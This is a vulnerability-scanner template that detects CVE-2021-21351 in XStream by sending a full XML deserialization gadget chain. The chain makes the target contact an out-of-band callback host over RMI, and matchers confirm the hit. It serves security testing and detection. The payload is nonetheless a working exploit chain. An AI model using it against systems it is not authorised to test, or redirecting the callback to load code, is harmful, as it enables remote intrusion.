136 lines
5.5 KiB
YAML
136 lines
5.5 KiB
YAML
id: CVE-2021-21351
|
|
|
|
info:
|
|
name: XStream <1.4.16 - Remote Code Execution
|
|
author: pwnhxl
|
|
severity: critical
|
|
description: |
|
|
XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
|
|
remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
|
|
- https://x-stream.github.io/CVE-2021-21351.html
|
|
- https://paper.seebug.org/1543/
|
|
- http://x-stream.github.io/changes.html#1.4.16
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21351
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2021-21351
|
|
cwe-id: CWE-434
|
|
epss-score: 0.77865
|
|
epss-percentile: 0.97919
|
|
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: xstream_project
|
|
product: xstream
|
|
tags: cve,cve2021,xstream,deserialization,rce,oast,vulhub
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<sorted-set>
|
|
<javax.naming.ldap.Rdn_-RdnEntry>
|
|
<type>ysomap</type>
|
|
<value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
|
|
<m__DTMXRTreeFrag>
|
|
<m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
|
|
<m__size>-10086</m__size>
|
|
<m__mgrDefault>
|
|
<__overrideDefaultParser>false</__overrideDefaultParser>
|
|
<m__incremental>false</m__incremental>
|
|
<m__source__location>false</m__source__location>
|
|
<m__dtms>
|
|
<null/>
|
|
</m__dtms>
|
|
<m__defaultHandler/>
|
|
</m__mgrDefault>
|
|
<m__shouldStripWS>false</m__shouldStripWS>
|
|
<m__indexing>false</m__indexing>
|
|
<m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
|
|
<fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
|
|
<javax.sql.rowset.BaseRowSet>
|
|
<default>
|
|
<concurrency>1008</concurrency>
|
|
<escapeProcessing>true</escapeProcessing>
|
|
<fetchDir>1000</fetchDir>
|
|
<fetchSize>0</fetchSize>
|
|
<isolation>2</isolation>
|
|
<maxFieldSize>0</maxFieldSize>
|
|
<maxRows>0</maxRows>
|
|
<queryTimeout>0</queryTimeout>
|
|
<readOnly>true</readOnly>
|
|
<rowSetType>1004</rowSetType>
|
|
<showDeleted>false</showDeleted>
|
|
<dataSource>rmi://{{interactsh-url}}/test</dataSource>
|
|
<listeners/>
|
|
<params/>
|
|
</default>
|
|
</javax.sql.rowset.BaseRowSet>
|
|
<com.sun.rowset.JdbcRowSetImpl>
|
|
<default/>
|
|
</com.sun.rowset.JdbcRowSetImpl>
|
|
</fPullParserConfig>
|
|
<fConfigSetInput>
|
|
<class>com.sun.rowset.JdbcRowSetImpl</class>
|
|
<name>setAutoCommit</name>
|
|
<parameter-types>
|
|
<class>boolean</class>
|
|
</parameter-types>
|
|
</fConfigSetInput>
|
|
<fConfigParse reference='../fConfigSetInput'/>
|
|
<fParseInProgress>false</fParseInProgress>
|
|
</m__incrementalSAXSource>
|
|
<m__walker>
|
|
<nextIsRaw>false</nextIsRaw>
|
|
</m__walker>
|
|
<m__endDocumentOccured>false</m__endDocumentOccured>
|
|
<m__idAttributes/>
|
|
<m__textPendingStart>-1</m__textPendingStart>
|
|
<m__useSourceLocationProperty>false</m__useSourceLocationProperty>
|
|
<m__pastFirstElement>false</m__pastFirstElement>
|
|
</m__dtm>
|
|
<m__dtmIdentity>1</m__dtmIdentity>
|
|
</m__DTMXRTreeFrag>
|
|
<m__dtmRoot>1</m__dtmRoot>
|
|
<m__allowRelease>false</m__allowRelease>
|
|
</value>
|
|
</javax.naming.ldap.Rdn_-RdnEntry>
|
|
<javax.naming.ldap.Rdn_-RdnEntry>
|
|
<type>ysomap</type>
|
|
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
|
<m__obj class='string'>test</m__obj>
|
|
</value>
|
|
</javax.naming.ldap.Rdn_-RdnEntry>
|
|
</sorted-set>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "timestamp"
|
|
- "com.thoughtworks.xstream"
|
|
condition: or
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
|
|
# digest: 490a00463044022000c22acfb662edd35edc582359641ea41aaf46674787cf9a19ae9aeeb44b70420220043f7e6cb8aec3a83a57c7949b8f23f2527779c08ac13e231f2eac8715c42a5b:922c64590222798bb761d5b6d8e72950
|